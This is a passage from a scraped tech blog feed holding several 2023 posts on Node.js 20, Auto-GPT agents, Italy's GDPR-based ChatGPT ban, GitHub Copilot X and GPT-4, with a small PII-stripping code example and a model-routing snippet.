Node.js has become the kind of boring, reliable infrastructure that you build businesses on — and I mean \u0026ldquo;boring\u0026rdquo; as the highest compliment.\nThe LTS schedule continues to be one of the best things about Node.js governance. Version 20 will enter Active LTS in October 2023, and teams can plan their upgrade paths with confidence. After the chaos of the early npm years, this kind of predictability is valuable.\nWhat I\u0026rsquo;m Watching # Two things I\u0026rsquo;ll be monitoring as Node.js 20 matures:\nPermission model adoption — Will the ecosystem embrace it? Will frameworks like Express or Fastify start documenting the permissions they need? This could become the foundation of a much stronger security story for Node.js.\nThe single-executable application feature — Also experimental in v20, the ability to bundle a Node.js app into a single executable (using the --experimental-sea-config flag) could change how we distribute Node.js tools. Think of it as Node\u0026rsquo;s answer to Go\u0026rsquo;s static binaries.\nMy Take # Node.js 20 isn\u0026rsquo;t exciting in the way that async/await in Node 8 was exciting. It\u0026rsquo;s exciting in the way that a well-maintained codebase is exciting — everything works a little better, the rough edges are getting smoothed out, and the platform is clearly being stewarded by people who care about the long-term.\nIf you\u0026rsquo;re starting a new Node.js project today, target version 20. If you\u0026rsquo;re on Node 18 LTS, plan your upgrade for when 20 hits LTS in October. And if you\u0026rsquo;re still on Node 16 — its end-of-life is September 2023, so start planning now.\nThe JavaScript runtime landscape has never been more competitive, with Deno and Bun both pushing interesting ideas. 
But Node.js remains the pragmatic choice for production workloads, and releases like this show why.\nThis post is part of my Developer Landscape series, covering the tools and platforms that shape how we build software.\n","date":"20 April 2023","externalUrl":null,"permalink":"/posts/230420-nodejs-20-release/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Node.js 20 arrives with an experimental permission model, a stable test runner, and continued signs that the runtime is prioritizing security and developer experience over flashy features.","title":"Node.js 20 Drops — Permission Model, Test Runner, and the Maturity Arc","type":"posts"},{"content":"If you\u0026rsquo;ve been anywhere near tech Twitter or Hacker News this past week, you\u0026rsquo;ve seen Auto-GPT. The project rocketed from obscurity to over 50,000 GitHub stars in a matter of days, becoming one of the fastest-growing repositories in the platform\u0026rsquo;s history. The premise is intoxicating: give GPT-4 the ability to chain its own prompts, browse the web, execute code, and manage files — essentially letting it operate autonomously toward a goal you define. This arrives just weeks after the ChatGPT API had democratized access to GPT capabilities and GPT-4 had proven its reasoning capabilities. But having spent the last few days experimenting with it, I think we need to separate the genuine breakthrough from the considerable hype.\nWhat Auto-GPT Actually Does # At its core, Auto-GPT is an orchestration layer around GPT-4 (or GPT-3.5-turbo). It implements a loop: the model receives a goal, breaks it into sub-tasks, executes them using various \u0026ldquo;abilities\u0026rdquo; (web search, file I/O, code execution), evaluates the results, and decides on next steps. 
It maintains both short-term and long-term memory using vector databases like Pinecone.\nThe architecture is conceptually simple:\nTask decomposition — The model generates a plan Action selection — It picks from available tools Execution — The selected action runs Reflection — The model evaluates results and adjusts Loop — Repeat until the goal is achieved or budget exhausted This is essentially the ReAct (Reasoning + Acting) pattern from the Yao et al. paper, now accessible to anyone with an OpenAI API key and a Python environment.\nThe Reality Check # Here\u0026rsquo;s what I\u0026rsquo;ve found after running Auto-GPT on several real tasks: it\u0026rsquo;s fascinating but deeply unreliable. A few observations from my experiments:\nToken costs spiral quickly. Each iteration of the reasoning loop consumes tokens. A moderately complex task can burn through $10-20 in API calls before producing anything useful. The model frequently gets stuck in loops, rephrasing the same query or revisiting failed approaches.\nHallucination compounds. When a human uses ChatGPT, they can catch hallucinations in real-time. When Auto-GPT uses GPT-4, hallucinated facts from step 3 become the foundation for step 4, which informs step 5. Errors don\u0026rsquo;t just persist — they amplify.\nLong-term memory is brittle. The vector database approach to memory works for retrieval, but the model struggles to maintain coherent state across many iterations. After 20-30 loops, it often loses track of what it\u0026rsquo;s already tried or accomplished.\nIt works best on well-structured tasks. Asking it to research a topic and write a summary? Decent results. Asking it to build a complete application? 
It\u0026rsquo;ll generate plausible-looking code that rarely runs correctly without significant human intervention.\nWhy It Matters Anyway # Despite these limitations, I think Auto-GPT represents something genuinely important: the first mainstream demonstration that LLMs can be more than conversation partners. The idea that a language model can be an agent — taking actions in the world, not just generating text — is a paradigm shift that\u0026rsquo;s going to reshape how we think about software architecture.\nConsider what\u0026rsquo;s happening in this space right now:\nLangChain is building a framework for chaining LLM calls with tool use BabyAGI takes a simpler approach to task-driven autonomous agents Microsoft\u0026rsquo;s JARVIS/HuggingGPT connects ChatGPT to specialized models on Hugging Face We\u0026rsquo;re watching the emergence of a new software pattern: the AI agent loop. And like any new pattern, the early implementations are rough, but the underlying idea has legs.\nWhat This Means for Our Craft # As a developer who\u0026rsquo;s been building software for three decades, I see autonomous agents as the next step in a long evolution of abstraction. We went from assembly to high-level languages, from manual deployment to CI/CD, from hand-written queries to ORMs. Each step traded fine-grained control for productivity. AI agents are the next trade-off on that spectrum. The broader agent-based systems emerging from this work show how far this concept has evolved.\nBut I want to be measured about this. The path from \u0026ldquo;impressive demo\u0026rdquo; to \u0026ldquo;production-ready tool\u0026rdquo; is long. Remember when chatbots were going to replace all customer service? When blockchain was going to decentralize everything? 
The underlying technology in each case was real, but the timeline and scope of transformation was wildly overestimated.\nWhat I expect to see in the near term is not fully autonomous agents replacing developers, but semi-autonomous agents augmenting specific workflows: automated code review, intelligent test generation, documentation maintenance, incident response triage. Tasks where the cost of occasional errors is low and human oversight remains in the loop.\nMy Take # Auto-GPT is the proof-of-concept that launched a thousand forks. It\u0026rsquo;s not production-ready, and anyone deploying it on critical tasks today is going to have a bad time. But it\u0026rsquo;s an incredibly important experiment because it demonstrates the architecture pattern clearly enough for the entire developer community to start iterating on it.\nThe projects that will matter aren\u0026rsquo;t Auto-GPT itself, but the frameworks, guardrails, and patterns that emerge from this explosion of interest. How do we build reliable agent loops? How do we implement proper error boundaries? How do we manage costs and prevent runaway API usage? These are engineering problems, and they\u0026rsquo;re solvable.\nI\u0026rsquo;m excited, but I\u0026rsquo;m keeping my expectations calibrated. The most impactful AI tools in my daily work are still the simpler ones — Copilot for code completion, ChatGPT for brainstorming and debugging. The autonomous future is coming, but it\u0026rsquo;s coming incrementally, not overnight.\nThis post is part of my AI in Development series, tracking how artificial intelligence is changing the way we build software.\n","date":"13 April 2023","externalUrl":null,"permalink":"/posts/230413-auto-gpt-autonomous-agents/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Auto-GPT has taken GitHub by storm, promising fully autonomous AI agents. 
Here’s what’s real, what’s hype, and what it means for developers.","title":"Auto-GPT and the Autonomous Agent Explosion","type":"posts"},{"content":"Last week, Italy\u0026rsquo;s data protection authority — the Garante per la Protezione dei Dati Personali — blocked ChatGPT from operating in the country, making it the first Western nation to ban the service. The immediate trigger was concerns about GDPR compliance: the lack of age verification, the absence of a legal basis for mass data collection used in training, and the potential for inaccurate personal information generation. I wrote about this initial action last week, and now we\u0026rsquo;re seeing the deeper implications unfold. As someone who\u0026rsquo;s been working with European data regulations for years, I find this both entirely predictable and deeply significant.\nThe Garante\u0026rsquo;s Case # The Italian regulator\u0026rsquo;s complaints aren\u0026rsquo;t frivolous. They raised four specific concerns that any privacy-focused engineer should take seriously:\nNo age verification — ChatGPT has no mechanism to prevent minors under 13 from accessing the service, a clear GDPR requirement when processing children\u0026rsquo;s data. No legal basis for training data — OpenAI scraped massive amounts of internet data, including personal information of EU citizens, without explicit consent or a clearly articulated legitimate interest. Inaccurate personal data — The model can and does generate factually incorrect information about real people, with no mechanism for correction or deletion. No transparency — Users weren\u0026rsquo;t adequately informed about how their data would be processed. OpenAI was given 20 days to respond with remediation measures or face fines of up to €20 million or 4% of global annual turnover. 
That\u0026rsquo;s the standard GDPR penalty framework, but applied to an AI service for arguably the first time at this scale.\nThe Technical Challenge of GDPR Compliance for LLMs # Here\u0026rsquo;s where it gets genuinely interesting from an engineering perspective. GDPR enshrines the \u0026ldquo;right to be forgotten\u0026rdquo; — Article 17 requires data controllers to erase personal data upon request. But how do you erase someone\u0026rsquo;s data from a large language model that has been trained on it?\nYou can\u0026rsquo;t simply delete a row from a database. The information is encoded across billions of parameters in ways that aren\u0026rsquo;t directly addressable. Fine-tuning to \u0026ldquo;unlearn\u0026rdquo; specific data is an active research area, but it\u0026rsquo;s far from production-ready. The practical options today are:\nRetraining from scratch without the offending data — prohibitively expensive for models of GPT-4\u0026rsquo;s scale. Output filtering — preventing the model from surfacing specific personal data, which is a band-aid rather than true erasure. Differential privacy techniques applied during training — useful prospectively, but doesn\u0026rsquo;t help with models already trained. This is a fundamental architectural tension. The way we build foundation models today is essentially incompatible with individual data subject rights as GDPR defines them. I\u0026rsquo;ve been saying for years that privacy-by-design needs to be more than a checkbox, and LLMs are about to stress-test that principle like nothing before.\nThe Domino Effect # Other European regulators are watching closely. France\u0026rsquo;s CNIL, Germany\u0026rsquo;s federal data protection commissioner, and Ireland\u0026rsquo;s DPC (which oversees many US tech companies\u0026rsquo; EU operations) have all signaled interest. 
The European Data Protection Board has established a task force specifically to coordinate enforcement approaches to ChatGPT across member states.\nThis isn\u0026rsquo;t going to stop at ChatGPT, either. Every company building or deploying large language models that touch EU citizen data needs to be thinking about this right now. Google\u0026rsquo;s Bard, Anthropic\u0026rsquo;s Claude, Meta\u0026rsquo;s LLaMA derivatives — they\u0026rsquo;ll all face the same scrutiny. The broader regulatory framework the EU AI Act is establishing will formalize many of these tensions into concrete compliance requirements.\nFor those of us building applications on top of these models, the compliance question cascades. If I build a customer-facing tool using the OpenAI API, am I a data controller or processor? What\u0026rsquo;s my obligation when a user asks me to delete their conversation data, knowing it may have been used for model improvement? These are questions my legal and engineering teams are actively wrestling with.\nMy Take # I\u0026rsquo;ve lived through enough regulatory waves — from the original EU Data Protection Directive in 1995 to GDPR\u0026rsquo;s enforcement in 2018 — to know that the industry\u0026rsquo;s initial reaction of \u0026ldquo;this is overreach\u0026rdquo; usually gives way to \u0026ldquo;actually, this pushed us to build better systems.\u0026rdquo; I expect the same pattern here.\nItaly\u0026rsquo;s ban feels blunt, but the underlying concerns are legitimate. OpenAI moved fast and didn\u0026rsquo;t fully account for regional regulatory requirements — a familiar story in tech. The 20-day remediation window suggests the Garante wants compliance, not a permanent ban.\nWhat I hope comes out of this is a serious technical conversation about privacy-preserving AI architectures. We need better tooling for data provenance in training sets, practical unlearning mechanisms, and clearer consent frameworks that work at the scale of modern AI. 
The companies that figure this out first will have a genuine competitive advantage in the European market — and probably globally, as other jurisdictions follow suit.\nThe era of \u0026ldquo;move fast and train on everything\u0026rdquo; is hitting a wall. As engineers, we need to start designing for data rights from the ground up, not bolting them on after regulators come knocking.\nThis post is part of my ongoing Security in Practice series, exploring the intersection of security, privacy, and real-world software engineering.\n","date":"6 April 2023","externalUrl":null,"permalink":"/posts/230406-italy-chatgpt-ban-gdpr/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Italy’s data protection authority blocks ChatGPT over GDPR concerns, setting a precedent for how AI services will navigate European privacy law.","title":"Italy Bans ChatGPT — When Privacy Regulators Meet AI","type":"posts"},{"content":"Italy just became the first Western country to ban ChatGPT. The Italian data protection authority, the Garante per la protezione dei dati personali, issued an immediate temporary restriction on OpenAI\u0026rsquo;s processing of Italian users\u0026rsquo; data, effectively blocking the service in the country. The reasons cited are serious: no legal basis for the massive data collection used to train the models, no age verification mechanism, and inaccurate information generated about individuals. This action comes just months after the ChatGPT API had been released and was driving mainstream adoption of AI tools.\nWhether you think this is regulatory overreach or necessary consumer protection, one thing is clear: the collision between AI systems and privacy law is no longer theoretical. And if you\u0026rsquo;re building applications on top of AI APIs, you need to understand what this means.\nThe Garante\u0026rsquo;s Specific Complaints # The Italian authority raised four distinct issues, and each one has implications beyond Italy:\n1. 
No legal basis for data processing. GDPR requires a lawful basis for processing personal data. OpenAI doesn\u0026rsquo;t have explicit consent from the individuals whose data was used to train ChatGPT, and the Garante isn\u0026rsquo;t convinced that \u0026ldquo;legitimate interest\u0026rdquo; — the catch-all basis many companies rely on — applies to scraping the internet to train an AI model.\n2. No age verification. ChatGPT\u0026rsquo;s terms of service require users to be 13+, but there\u0026rsquo;s no mechanism to enforce this. Under GDPR, services directed at children (or that don\u0026rsquo;t prevent children from accessing them) face stricter requirements. The Garante argues that ChatGPT\u0026rsquo;s lack of age gates violates these provisions.\n3. Inaccurate personal data. ChatGPT generates text that can include factually incorrect information about real people. Under GDPR, individuals have the right to rectification of inaccurate personal data. But how do you \u0026ldquo;rectify\u0026rdquo; a language model? You can\u0026rsquo;t simply edit a database record — the misinformation is encoded across billions of model parameters, not stored in any single addressable place.\n4. No transparency about data collection. Users weren\u0026rsquo;t adequately informed about how their data (including conversations with ChatGPT) would be processed, retained, and potentially used for further training.\nWhy This Matters Beyond Italy # If you\u0026rsquo;re outside Italy and thinking \u0026ldquo;not my problem,\u0026rdquo; consider this: the GDPR applies across the entire European Economic Area. Italy moved first, but the concerns the Garante raised are not Italy-specific. France\u0026rsquo;s CNIL, Ireland\u0026rsquo;s DPC, and Germany\u0026rsquo;s data protection authorities have all been asking similar questions. The European Data Protection Board could coordinate a unified response.\nMore broadly, this exposes a fundamental tension in how large language models work. 
The GDPR was designed for a world where data processing is relatively transparent and bounded — a company collects specific data, uses it for stated purposes, and allows individuals to access, correct, or delete their data. LLMs don\u0026rsquo;t fit this model. The broader challenge of regulating AI development has become urgent as capabilities expand rapidly.\nTraining data: Scraped from the open internet, likely containing personal data from millions of people who never consented to this use. Model outputs: Can generate false statements about real individuals, with no clear mechanism for correction. User inputs: Conversations with AI services may be retained and used for further training, creating a secondary data processing concern. There\u0026rsquo;s no easy technical fix for any of these. You can\u0026rsquo;t \u0026ldquo;delete\u0026rdquo; someone from a trained model without retraining it. You can\u0026rsquo;t prevent a probabilistic text generator from occasionally producing inaccurate statements about individuals. And the scale of internet scraping required to train these models makes individual consent impractical.\nWhat This Means for Developers Building with AI # If you\u0026rsquo;re integrating OpenAI\u0026rsquo;s API (or any LLM) into applications that serve European users, here\u0026rsquo;s what you should be thinking about right now:\nData processing agreements: Make sure your DPA with OpenAI (or your AI provider) covers your GDPR obligations. If you\u0026rsquo;re sending user data to the API, you\u0026rsquo;re a data controller, and the AI provider is a data processor. The contractual chain needs to be solid.\nPrivacy notices: Your privacy policy needs to explicitly state that user inputs may be processed by a third-party AI service. Be specific about what data is sent, how it\u0026rsquo;s used, and whether it\u0026rsquo;s retained. 
Vague references to \u0026ldquo;AI-powered features\u0026rdquo; won\u0026rsquo;t cut it.\nData minimization: Don\u0026rsquo;t send more data to the AI API than you need. If you\u0026rsquo;re building a customer support bot, strip out personally identifiable information before sending the conversation context to the model. This isn\u0026rsquo;t just good privacy practice — it\u0026rsquo;s a GDPR requirement.\nRight to erasure: If a user invokes their GDPR right to deletion, you need to be able to delete their interactions with the AI service. Make sure you\u0026rsquo;re logging what you send and have the ability to request deletion from your AI provider.\nOpt-out mechanisms: Consider giving users the choice to use your service without AI features. This may be legally required in some jurisdictions and is certainly good practice from a trust perspective.\n# Example: Strip PII before sending to AI API\ndef sanitize_for_ai(user_message: str, user_data: dict) -\u0026gt; str:\n    sanitized = user_message\n    for field in [\u0026#39;email\u0026#39;, \u0026#39;phone\u0026#39;, \u0026#39;name\u0026#39;, \u0026#39;address\u0026#39;]:\n        if user_data.get(field):\n            sanitized = sanitized.replace(user_data[field], f\u0026#39;[{field.upper()}]\u0026#39;)\n    return sanitized\nSimple? Yes. Foolproof? No. But it\u0026rsquo;s a starting point that demonstrates a good-faith effort at data minimization.\nThe Bigger Picture: Regulation Is Catching Up # This ban is happening against the backdrop of the EU AI Act, which is working its way through the legislative process. That regulation will create a comprehensive framework for AI governance in Europe, including requirements for transparency, risk assessment, and human oversight. The compliance requirements are becoming concrete as regulators set deadlines. 
The ChatGPT ban is a preview of the enforcement posture we can expect.\nThe US is taking a different approach — the National Cybersecurity Strategy I wrote about recently focuses more on liability than prescriptive regulation — but the direction is the same. Governments worldwide are recognizing that AI systems need guardrails, and they\u0026rsquo;re willing to enforce them.\nMy Take # I think Italy\u0026rsquo;s action is blunt but not unreasonable. The specific concerns about training data consent, age verification, and data accuracy are legitimate under existing law. OpenAI has 20 days to respond with remediation measures, and I expect they will — adding age verification, improving privacy notices, and possibly offering data deletion mechanisms.\nBut the deeper issue won\u0026rsquo;t be resolved by a few UI changes. The fundamental architecture of large language models — trained on massive, poorly documented datasets, generating probabilistic outputs that can\u0026rsquo;t be fully controlled — sits uncomfortably within a regulatory framework designed for traditional data processing.\nAs developers, we need to build with this tension in mind. Don\u0026rsquo;t assume that because an AI API is available, it\u0026rsquo;s compliant in every jurisdiction. Don\u0026rsquo;t assume that your AI provider handles all regulatory obligations on your behalf. And don\u0026rsquo;t assume this is a European problem that doesn\u0026rsquo;t affect you — similar regulatory movements are underway globally.\nBuild your AI integrations with privacy by design. 
It\u0026rsquo;s not just good ethics — increasingly, it\u0026rsquo;s the law.\nThis post is part of my Security in Practice series, examining the intersection of security, privacy, and modern software development.\n","date":"30 March 2023","externalUrl":null,"permalink":"/posts/230330-italy-bans-chatgpt-gdpr-ai-collision/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"Italy’s data protection authority blocks ChatGPT over GDPR concerns, raising questions every company building with AI needs to answer.","title":"Italy Bans ChatGPT — When GDPR and AI Collide","type":"posts"},{"content":"Yesterday, GitHub unveiled Copilot X, and it\u0026rsquo;s the most ambitious vision for AI-assisted development I\u0026rsquo;ve seen from any company. Not just better code completion — we\u0026rsquo;re talking chat in your IDE, AI-generated pull request descriptions, automated test generation, voice coding, and personalized documentation answers. All backed by GPT-4.\nIf you thought Copilot was just a fancy autocomplete, GitHub is making it clear: they see AI as a layer that touches every part of the development workflow. And having spent the morning going through the announcements, I think they might actually pull it off.\nBeyond Code Completion # The original Copilot, which I\u0026rsquo;ve been using since its general availability last June, is a code completion tool. You type, it suggests. Useful, sometimes magical, occasionally hilariously wrong. But fundamentally it\u0026rsquo;s a single-interaction pattern: you write context, it predicts what comes next.\nCopilot X expands this into multiple interaction patterns:\nCopilot Chat: A ChatGPT-style interface embedded directly in VS Code and the JetBrains IDEs. You can ask it to explain code, suggest refactors, find bugs, or generate unit tests. 
Unlike going to ChatGPT in a browser, the chat has your project context — it can see the file you\u0026rsquo;re working on, your open tabs, and potentially your broader codebase.\nCopilot for Pull Requests: This is the feature that caught my attention most. It can automatically generate PR descriptions based on the diff, and more importantly, it can suggest missing tests and flag potential issues before a human reviewer even looks at the code. GitHub is also working on AI-generated review comments.\nCopilot for Docs: Ask natural language questions about a library\u0026rsquo;s documentation and get answers synthesized from the actual docs. GitHub is starting with their own documentation, React, Azure, and MDN. For developers who spend half their day searching Stack Overflow and reading docs, this could be genuinely transformative.\nCopilot Voice: Write code using voice commands. Early days, but the accessibility implications are significant.\nThe GPT-4 Upgrade # The move from Codex (the GPT-3 variant that powered the original Copilot) to GPT-4 is significant. Based on my own testing of GPT-4 over the past week, the improvement in code reasoning is substantial. It understands multi-file context better, handles complex logic more reliably, and produces fewer subtle bugs.\nFor Copilot specifically, this means:\nSuggestions that account for broader context, not just the current function Better understanding of intent when variable names and comments are vague More reliable generation of boilerplate-heavy patterns (API handlers, database models, test fixtures) Improved handling of less common languages and frameworks The real test will be whether these improvements survive the move from the demo environment to production use at scale. OpenAI\u0026rsquo;s API has had reliability issues, and Copilot\u0026rsquo;s real-time completion model requires consistent low-latency responses. 
If there\u0026rsquo;s a noticeable delay between typing and seeing suggestions, the experience degrades quickly.\nWhat This Means for Development Teams # I\u0026rsquo;ve been managing development teams for over two decades, and the workflow implications here are broader than just individual productivity. Consider:\nCode review processes need to adapt. If Copilot is generating PR descriptions and flagging issues, what\u0026rsquo;s the human reviewer\u0026rsquo;s role? I\u0026rsquo;d argue it becomes more important, not less — you\u0026rsquo;re reviewing the AI\u0026rsquo;s suggestions alongside the code, and you need to be alert to cases where the AI\u0026rsquo;s summary doesn\u0026rsquo;t match what the code actually does.\nOnboarding gets easier. New team members ramping up on a codebase can use Copilot Chat to ask questions about the code itself. \u0026ldquo;What does this service do?\u0026rdquo; \u0026ldquo;Why is this pattern used here?\u0026rdquo; Instead of interrupting senior engineers, they can get contextual answers from the AI. The senior engineers still need to validate those answers, but it reduces the interrupt-driven cost of knowledge transfer.\nDocumentation debt becomes more visible. When Copilot for Docs can\u0026rsquo;t answer a question about your project, it\u0026rsquo;s because your documentation is missing or unclear. This creates a natural feedback loop that makes documentation gaps more apparent.\nTesting practices could improve. If AI-suggested tests become part of the PR workflow, teams that currently under-test might find themselves writing more tests — not because of discipline, but because the suggestion is right there and it takes less effort to accept it than to dismiss it.\nThe Vendor Lock-In Conversation # Let\u0026rsquo;s be real about what GitHub is doing here. They\u0026rsquo;re building a deeply integrated AI layer that works best within the GitHub ecosystem — VS Code, GitHub repos, GitHub Actions, GitHub Docs. 
If you\u0026rsquo;re already all-in on GitHub, this is convenient. If you\u0026rsquo;re not, it creates a gravitational pull that\u0026rsquo;s hard to resist.\nThe competitive landscape is still forming. JetBrains has its own AI assistant in development. Amazon has CodeWhisperer. Sourcegraph has Cody. Replit is building AI-native development from the ground up. But GitHub\u0026rsquo;s advantage is distribution — they\u0026rsquo;re where the code already lives for millions of developers.\nFor teams that are cautious about vendor concentration, this is worth a deliberate conversation. The productivity benefits of deep integration are real, but so is the risk of building your entire workflow around a single vendor\u0026rsquo;s AI capabilities.\nMy Take # I\u0026rsquo;ve been skeptical about the \u0026ldquo;AI will replace developers\u0026rdquo; narrative, and nothing in the Copilot X announcement changes that. These are tools that amplify developer capability, not replace it. The developer who uses Copilot X effectively will outperform the developer who doesn\u0026rsquo;t, just like the developer who mastered their IDE outperformed the one who didn\u0026rsquo;t.\nWhat excites me most is Copilot for Pull Requests. Code review is one of the highest-leverage activities in software development, and it\u0026rsquo;s also one of the most inconsistent. If AI can handle the mechanical aspects — verifying test coverage, checking for common patterns, generating clear descriptions — human reviewers can focus on the things AI still struggles with: architectural judgment, business logic validation, and mentoring.\nWhat concerns me is the pace. GitHub is announcing features faster than most organizations can evaluate them. The pressure to adopt will be real, and I\u0026rsquo;d encourage teams to be intentional about which features they enable and how they integrate them into existing workflows. 
Not every AI feature is appropriate for every team.\nStart with Copilot Chat if you\u0026rsquo;re already a Copilot user. It\u0026rsquo;s the most natural extension of the existing experience. Evaluate PR features carefully in a trial period before making them standard. And keep talking to your team about when AI suggestions are helpful and when they\u0026rsquo;re noise.\nThis post is part of my Developer Landscape series, covering the tools and trends shaping modern software development.\n","date":"23 March 2023","externalUrl":null,"permalink":"/posts/230323-github-copilot-x-ai-powered-developer-experience/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"GitHub announces Copilot X with GPT-4 integration, chat, voice, pull request summaries, and docs — here’s what developers should actually expect.","title":"GitHub Copilot X — The AI-Powered Developer Experience Takes Shape","type":"posts"},{"content":"Two days ago, OpenAI released GPT-4, and after spending the last 48 hours putting it through its paces, I can say with confidence: this is a meaningful leap over GPT-3.5. Not the \u0026ldquo;artificial general intelligence\u0026rdquo; some are breathlessly claiming, but a substantially more capable, more reliable, and more nuanced model that will meaningfully change what\u0026rsquo;s possible for developers.\nI wrote about the ChatGPT API release just two weeks ago, and already that feels like a warm-up act. GPT-4 isn\u0026rsquo;t just incrementally better — it\u0026rsquo;s qualitatively different in ways that matter for real-world applications. This builds on the foundation of ChatGPT\u0026rsquo;s explosive growth and represents the natural evolution of capabilities we\u0026rsquo;d begun exploring with early GPT-3 deployments.\nWhat\u0026rsquo;s Actually New # The headline features are multimodal input (text and images, though the image capability isn\u0026rsquo;t in the API yet) and dramatically improved reasoning. 
But the improvements that matter most for developers are more subtle:\nLonger context window: GPT-4 comes in two variants — an 8K token context and a 32K token context. The 32K variant can process roughly 50 pages of text in a single prompt. This fundamentally changes what you can do with in-context learning. Instead of carefully summarizing documentation to fit the context, you can often just… include it.\nImproved instruction following: GPT-3.5 had a tendency to drift off-task, especially with complex multi-step instructions. GPT-4 is noticeably more disciplined. When I give it a system prompt that says \u0026ldquo;respond only in JSON format,\u0026rdquo; it actually does — consistently. This reliability is critical for production applications where you\u0026rsquo;re parsing AI output programmatically.\nBetter reasoning about code: I\u0026rsquo;ve been testing it on code review, bug identification, and architectural analysis. The results are striking. It catches edge cases that GPT-3.5 missed entirely. It can reason about race conditions, identify security vulnerabilities in authentication flows, and explain complex algorithms with genuine clarity.\nOpenAI\u0026rsquo;s own benchmarks show GPT-4 passing the Uniform Bar Exam in the 90th percentile (GPT-3.5 was in the 10th). Whether bar exam performance translates to practical utility is debatable, but the magnitude of improvement is not.\nThe Developer Experience # Getting access requires either a ChatGPT Plus subscription ($20/month for the chat interface) or API access through the waitlist. API pricing is significantly higher than gpt-3.5-turbo: $0.03 per 1K prompt tokens and $0.06 per 1K completion tokens for the 8K model. That\u0026rsquo;s 15-30x more expensive than the ChatGPT API. As we saw with GPT-3 API accessibility, pricing plays a critical role in determining adoption and architectural patterns.\nThis pricing creates an interesting architectural decision. 
For many applications, the right approach will be a tiered system: use gpt-3.5-turbo for routine tasks and route complex queries to GPT-4. The cost difference is large enough that you can\u0026rsquo;t just swap models blindly in a high-volume application.\ndef get_model_for_task(task_complexity: str) -\u0026gt; str: if task_complexity == \u0026#34;complex\u0026#34;: return \u0026#34;gpt-4\u0026#34; return \u0026#34;gpt-3.5-turbo\u0026#34; Simplistic, obviously, but the principle matters. Intelligent routing between models is going to become a standard architectural pattern. Think of it like using different database tiers — you don\u0026rsquo;t query your analytics warehouse for a simple key lookup.\nWhere GPT-4 Genuinely Excels # After extensive testing, here\u0026rsquo;s where I see the most impactful improvements for software development workflows:\nComplex code generation: Ask it to implement a rate limiter with token bucket algorithm, sliding window fallback, and distributed state via Redis. GPT-3.5 would give you a plausible but often buggy implementation. GPT-4 produces code that\u0026rsquo;s closer to production-ready, with proper error handling and edge case management.\nTechnical document analysis: Feed it an RFC or a long technical specification and ask it to summarize the key changes, identify potential implementation challenges, or compare it to a previous version. The 32K context window makes this practical in a way it wasn\u0026rsquo;t before.\nSystem design reasoning: Describe an architecture and ask it to identify single points of failure, suggest improvements, or evaluate trade-offs. GPT-4\u0026rsquo;s responses here feel qualitatively different — it considers failure modes, discusses consistency/availability trade-offs, and asks clarifying questions about requirements.\nCode review: Point it at a pull request diff and ask for a review. 
It catches logical errors, suggests performance improvements, and identifies patterns that violate SOLID principles. It\u0026rsquo;s not replacing a senior engineer\u0026rsquo;s review, but it\u0026rsquo;s a useful first pass.\nThe Limitations You Need to Know # GPT-4 is impressive, but it\u0026rsquo;s not infallible. A few important limitations:\nIt still hallucinates. Less frequently than GPT-3.5, and the hallucinations are often more subtle, which in some ways makes them more dangerous. It will confidently cite API methods that don\u0026rsquo;t exist or describe library features that were never implemented. Always verify.\nThe knowledge cutoff is September 2021. Same as GPT-3.5. It doesn\u0026rsquo;t know about libraries released after that date, recent API changes, or current best practices that have evolved since then. This is a significant limitation for a tool marketed toward developers.\nSpeed and cost. GPT-4 is noticeably slower than GPT-3.5, and the cost difference means you need to be intentional about when you use it. For time-sensitive applications, the latency might be a dealbreaker.\nIt\u0026rsquo;s not open. OpenAI\u0026rsquo;s technical report and system card deliberately withhold model details. We don\u0026rsquo;t know the parameter count, training data, or architectural specifics. For those of us who value understanding our tools, this opacity is frustrating.\nMy Take # I\u0026rsquo;ve been cautiously skeptical about the AI hype cycle, and I stand by that caution. GPT-4 is not AGI. It\u0026rsquo;s not going to replace software engineers. It\u0026rsquo;s not going to solve alignment. It is, however, the most useful AI tool I\u0026rsquo;ve had access to in my career. The journey from the initial GPT-3 language model through ChatGPT to GPT-4 shows the accelerating pace of capability improvements in the AI space.\nThe practical gap between GPT-3.5 and GPT-4 is large enough to unlock use cases that were previously unreliable. 
Code review assistance, documentation generation, complex query answering, architectural analysis — these move from \u0026ldquo;sometimes useful\u0026rdquo; to \u0026ldquo;reliably valuable.\u0026rdquo;\nMy recommendation: get on the API waitlist if you haven\u0026rsquo;t already. Start with the use cases where accuracy matters most and where you have human review in the loop. Build your applications with model-agnostic abstractions so you can swap between GPT-3.5 and GPT-4 based on task requirements and budget constraints.\nThis is a tool worth integrating into your workflow. Just remember it\u0026rsquo;s a tool, not a colleague — it doesn\u0026rsquo;t understand, it predicts. Keep your critical thinking engaged.\nThis post is part of my AI in Development series, where I track the real-world impact of AI tools on software engineering.\n","date":"16 March 2023","externalUrl":null,"permalink":"/posts/230316-gpt4-lands-and-raises-the-bar/","section":"Tech Blog: AI, Security, Infrastructure \u0026 Open Source","summary":"OpenAI releases GPT-4 with multimodal capabilities and dramatically improved reasoning — here’s what it means for developers.","title":"GPT-4 Lands — And It Raises the Bar Significantly","type":"posts"},{"content":"Last week, the Biden administration released its National Cybersecurity Strategy, and buried in the policy language is a tectonic shift that should have every software vendor, open-source maintainer, and enterprise development team sitting up straight. The document explicitly calls for shifting cybersecurity liability from end users to the companies that build and maintain software.\nIf you\u0026rsquo;re a developer reading this and thinking \u0026ldquo;that\u0026rsquo;s a policy thing, not my problem\u0026rdquo; — I\u0026rsquo;d urge you to reconsider. 
